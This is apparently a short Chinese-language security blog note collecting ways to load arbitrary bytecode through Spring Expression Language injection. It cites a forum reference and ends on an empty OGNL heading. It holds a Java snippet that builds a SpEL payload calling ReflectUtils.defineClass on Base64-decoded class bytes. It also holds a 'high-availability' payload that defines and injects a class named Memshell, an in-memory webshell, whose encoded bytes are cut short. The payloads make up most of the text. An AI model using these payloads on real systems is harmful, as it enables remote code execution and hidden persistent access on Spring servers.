记录一些EL加载字节码的方式

spel

org.springframework.cglib.core.ReflectUtils这个类重写了defineClass并且public

1
2
3
4
5
6
String spel = "T(org.springframework.cglib.core.ReflectUtils).defineClass(\"" + classname + "\"," +
"T(org.springframework.util.Base64Utils).decodeFromString(" +
"\"" +
code + "\")," +
"T(java.lang.Thread).currentThread().getContextClassLoader()" +
").newInstance()";

就可以了

我这里获取的ClassLoader是T(java.lang.Thread).currentThread().getContextClassLoader()

还有别的,看具体环境,例如T(org.springframework.util.ClassUtils).getDefaultClassLoader()

参考https://forum.butian.net/share/1385

高可用payload,不过这个payload好像是有点问题

1
#{T(org.springframework.cglib.core.ReflectUtils).defineClass('Memshell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL\[0\],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}

不知道还有没有别的可用的defineClass,感觉应该是还有

ognl